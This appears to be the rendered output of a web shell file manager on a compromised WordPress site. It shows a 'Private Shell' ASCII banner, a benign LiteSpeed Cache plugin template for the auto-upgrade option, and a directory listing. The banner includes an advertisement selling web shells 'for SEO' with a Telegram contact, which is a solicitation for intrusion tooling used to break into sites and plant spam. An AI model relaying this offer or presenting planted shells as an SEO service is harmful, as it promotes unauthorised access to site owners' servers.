__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * LiteSpeed Cache Auto Upgrade Setting * * Manages the auto-upgrade setting for LiteSpeed Cache. * * @package LiteSpeed * @since 1.0.0 */ namespace LiteSpeed; defined( 'WPINC' ) || exit; ?> <!-- build_setting_auto_upgrade --> <tr> <th> <?php $option_id = Base::O_AUTO_UPGRADE; ?> <?php $this->title( $option_id ); ?> </th> <td> <?php $this->build_switch( $option_id ); ?> <div class="litespeed-desc"> <?php esc_html_e( 'Turn this option ON to have LiteSpeed Cache updated automatically, whenever a new version is released. If OFF, update manually as usual.', 'litespeed-cache' ); ?> </div> </td> </tr>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| entry.tpl.php | File | 1.31 KB | 0644 |
|
| network_settings.tpl.php | File | 1.18 KB | 0644 |
|
| online.tpl.php | File | 12.09 KB | 0644 |
|
| settings.tpl.php | File | 5.97 KB | 0644 |
|
| settings_inc.auto_upgrade.tpl.php | File | 651 B | 0644 |
|
| settings_inc.guest.tpl.php | File | 2.11 KB | 0644 |
|
| settings_tuning.tpl.php | File | 1.55 KB | 0644 |
|